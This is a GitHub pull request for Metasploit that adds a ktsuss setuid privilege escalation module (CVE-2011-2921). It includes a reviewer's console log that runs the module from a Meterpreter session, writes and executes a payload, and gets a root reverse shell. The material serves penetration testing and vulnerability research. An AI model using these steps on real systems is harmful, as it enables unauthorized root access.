Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ktsuss suid Privilege Escalation module (CVE-2011-2921) #12212

Merged
merged 2 commits into from Sep 2, 2019

Conversation

@bcoles
Copy link
Contributor

commented Aug 19, 2019

Add ktsuss suid Privilege Escalation module (CVE-2011-2921)

Still relevant in 2019

    This module attempts to gain root privileges by exploiting a
    vulnerability in ktsuss versions 1.4 and prior.

    The `ktsuss` executable is setuid `root` and does not drop
    privileges prior to executing user specified commands,
    resulting in command execution with `root` privileges.

    This module has been tested successfully on:

    ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
    ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented Aug 31, 2019

Bump. Should be an easy merge.

@h00die h00die self-assigned this Sep 2, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

commented Sep 2, 2019

downloading sparky now. may not get to it till tomorrow though

@h00die

This comment has been minimized.

Copy link
Contributor

commented Sep 2, 2019

Working for me:

[*] Meterpreter session 1 opened (111.111.1.111:4444 -> 222.222.2.222:56788) at 2019-09-02 13:25:07 -0400

meterpreter > sysinfo
Computer     : 222.222.2.222
OS           : Sparky 5.8 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=1000, gid=1001, euid=1000, egid=1001
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/ktsuss_suid_priv_esc 
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check

[+] /usr/bin/ktsuss is setuid
[*] uid=1000(sparky) gid=1001(sparky) euid=0(root) groups=1001(sparky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(autologin)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run

[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] /usr/bin/ktsuss is setuid
[*] uid=1000(sparky) gid=1001(sparky) euid=0(root) groups=1001(sparky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(autologin)
[*] Writing '/tmp/.qrUo7wJrpWx7fqQ' (323 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 222.222.2.222

[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:56790) at 2019-09-02 13:26:00 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

I'll go ahead and fix those two little things while i merge now

h00die added a commit that referenced this pull request Sep 2, 2019

@h00die h00die merged commit 9ce3365 into rapid7:master Sep 2, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@h00die

This comment has been minimized.

Copy link
Contributor

commented Sep 2, 2019

Release Notes

This PR adds a linux local privilege escalation exploit of ktsuss from 2011, which can still be used on modern Sparky Linux distributions.

@bcoles bcoles deleted the bcoles:ktsuss_suid_priv_esc branch Sep 2, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.